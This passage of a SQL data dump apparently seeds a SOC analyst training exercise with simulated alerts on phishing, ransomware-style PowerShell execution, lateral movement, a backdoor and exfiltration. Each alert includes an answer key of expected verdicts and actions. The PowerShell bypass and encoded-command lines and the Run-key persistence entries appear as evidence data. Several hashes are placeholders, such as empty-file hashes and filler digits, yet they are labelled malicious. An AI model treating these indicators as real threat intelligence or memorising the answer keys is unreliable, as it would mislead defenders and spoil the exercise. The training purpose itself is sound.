detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:34Z\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Malware\\\\\\\\maliciousapp.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Registry Key Created\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:34Z\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Malware\\\\\\\\maliciousapp.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Registry Key Created\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:34Z\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Malware\\\\\\\\maliciousapp.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Registry Key Created\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:34Z\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Malware\\\\\\\\maliciousapp.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Registry Key Created\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:34Z\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"registry_key_modified\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Malware\\\\\\\\maliciousapp.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action\\\":\\\"Registry Key Created\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1550, 'Unusual Lateral Movement Activity', 'high', 'Network Traffic Analysis', 'Detected lateral movement from internal host 192.168.1.45 using compromised credentials to access additional network resources. The attacker is using tools to locate and prepare systems for encryption.', 'Lateral Movement', 'T1021 - Remote Services', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"10.0.0.23\",\"external_attacker_ip\":\"203.0.113.55\",\"protocol\":\"SMB\",\"username\":\"jdoe\",\"filename\":\"ransom_tool.exe\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"action\":\"attempted lateral movement\",\"event_id\":\"LM-456789\"}', '2026-03-15 19:12:22', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known suspicious IP address associated with prior attacks\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Compromised user account\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransom_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Ransomware tool used in lateral movement\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1551, 'Data Exfiltration Attempts Detected', 'high', 'Data Loss Prevention (DLP) Systems', 'In the final stage of their attack cycle, attackers attempted to exfiltrate sensitive data from the target network. The data was intended to be used as leverage for ransom, threatening its release if demands were not met. The DLP system detected unusual outbound data movement, aligning with known exfiltration techniques.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:31Z\",\"event\":\"data_exfiltration_attempt\",\"source_ip\":\"10.1.1.5\",\"destination_ip\":\"198.51.100.22\",\"filename\":\"confidential_docs.zip\",\"hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"user\":\"jdoe\",\"protocol\":\"HTTPS\",\"action\":\"blocked\",\"dlp_rule\":\"High_Sensitivity_Data_Exfiltration\"}', '2026-03-15 19:12:22', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known command and control server involved in previous ransomware attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_docs.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"suspicious\",\"details\":\"File containing high sensitivity data flagged during exfiltration attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.469Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"198.51.100.22\\\",\\\"filename\\\":\\\"confidential_docs.zip\\\",\\\"hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"dlp_rule\\\":\\\"High_Sensitivity_Data_Exfiltration\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.469Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"198.51.100.22\\\",\\\"filename\\\":\\\"confidential_docs.zip\\\",\\\"hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"dlp_rule\\\":\\\"High_Sensitivity_Data_Exfiltration\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.469Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"198.51.100.22\\\",\\\"filename\\\":\\\"confidential_docs.zip\\\",\\\"hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"dlp_rule\\\":\\\"High_Sensitivity_Data_Exfiltration\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.469Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"198.51.100.22\\\",\\\"filename\\\":\\\"confidential_docs.zip\\\",\\\"hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"dlp_rule\\\":\\\"High_Sensitivity_Data_Exfiltration\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.469Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"10.1.1.5\\\",\\\"destination_ip\\\":\\\"198.51.100.22\\\",\\\"filename\\\":\\\"confidential_docs.zip\\\",\\\"hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"dlp_rule\\\":\\\"High_Sensitivity_Data_Exfiltration\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1552, 'Phishing Email Detected', 'medium', 'Email Gateway Logs', 'A phishing email was detected targeting a school administrator with a malicious attachment aimed at gaining network access.', 'Initial Access', 'T1566.001 - Phishing: Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:30Z\",\"email_subject\":\"Urgent: Update Your Account Information\",\"sender_email\":\"support@fakeschool.org\",\"recipient_email\":\"admin@schooldistrict.edu\",\"attachment_name\":\"UpdateAccount.pdf\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"malicious_url\":\"http://malicious-domain.com/secure\",\"attacker_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.12.55\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\"}', '2026-03-15 19:12:42', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@fakeschool.org\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known phishing email sender\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as malware\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-domain.com/secure\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan.io\",\"verdict\":\"malicious\",\"details\":\"Phishing site\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IPVoid\",\"verdict\":\"malicious\",\"details\":\"Associated with phishing campaigns\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.12.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"School district internal network\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-03-15T20:58:15.471Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1553, 'Malicious Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'A malicious script was executed on the administrator\'s computer, initiating a ransomware payload. The execution followed the opening of a phishing email.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:23:45Z\",\"event_id\":4624,\"computer_name\":\"admin-pc.corp.local\",\"user_name\":\"admin_user\",\"process_name\":\"powershell.exe\",\"script_path\":\"C:\\\\Users\\\\admin_user\\\\Downloads\\\\malicious_script.ps1\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"sha256_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"internal_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.5\",\"destination_ip\":\"192.168.1.50\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\admin_user\\\\Downloads\\\\malicious_script.ps1\"}', '2026-03-15 19:12:42', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with known ransomware payloads\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"MD5 hash linked to ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP known for hosting malicious infrastructure\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"User account involved in the incident\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1554, 'Backdoor Established', 'high', 'Network Traffic Analysis', 'The attackers have successfully installed a backdoor on the compromised system to maintain persistent access. This was detected through unusual outbound network traffic indicating communication with a known malicious IP address.', 'Persistence', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"file_hash\":\"e9d8f7a3c6b4f1e2d5c8be7f6a9b3c4d\",\"filename\":\"backdoor_installer.exe\",\"username\":\"compromised_user\",\"action\":\"connection_attempt\",\"outcome\":\"allowed\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-03-15 19:12:42', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server for APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e9d8f7a3c6b4f1e2d5c8be7f6a9b3c4d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as a backdoor installer used by APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"backdoor_installer.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual executable found on the system.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1555, 'Internal Network Scanning', 'medium', 'Intrusion Detection System (IDS)', 'An intermediate-level alert indicating potential lateral movement by attackers who have initiated internal network scanning to identify and access critical systems containing sensitive student data.', 'Lateral Movement', 'T1046 - Network Service Scanning', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:58Z\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"10.0.0.5\",\"external_attacker_ip\":\"203.0.113.45\",\"scanned_ports\":[22,80,443],\"user\":\"compromised_user\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"network_scan_tool.exe\",\"event_id\":\"ID34567\",\"severity\":\"medium\",\"action\":\"scan detected\"}', '2026-03-15 19:12:42', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address, part of the local network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal server storing sensitive student data.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known network scanning tool used by APT groups.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"network_scan_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"endpoint_security\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used for network scanning utilities.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_security\",\"verdict\":\"suspicious\",\"details\":\"User credentials likely compromised and used for unauthorized activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.482Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:58Z\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scanned_ports\\\":[22,80,443],\\\"user\\\":\\\"compromised_user\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"network_scan_tool.exe\\\",\\\"event_id\\\":\\\"ID34567\\\",\\\"severity\\\":\\\"medium\\\",\\\"action\\\":\\\"scan detected\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.482Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:58Z\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scanned_ports\\\":[22,80,443],\\\"user\\\":\\\"compromised_user\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"network_scan_tool.exe\\\",\\\"event_id\\\":\\\"ID34567\\\",\\\"severity\\\":\\\"medium\\\",\\\"action\\\":\\\"scan detected\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.482Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:58Z\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scanned_ports\\\":[22,80,443],\\\"user\\\":\\\"compromised_user\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"network_scan_tool.exe\\\",\\\"event_id\\\":\\\"ID34567\\\",\\\"severity\\\":\\\"medium\\\",\\\"action\\\":\\\"scan detected\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.482Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:58Z\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.45\\\",\\\"scanned_ports\\\":[22,80,443],\\\"user\\\":\\\"compromised_user\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"network_scan_tool.exe\\\",\\\"event_id\\\":\\\"ID34567\\\",\\\"severity\\\":\\\"medium\\\",\\\"action\\\":\\\"scan detected\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.482Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 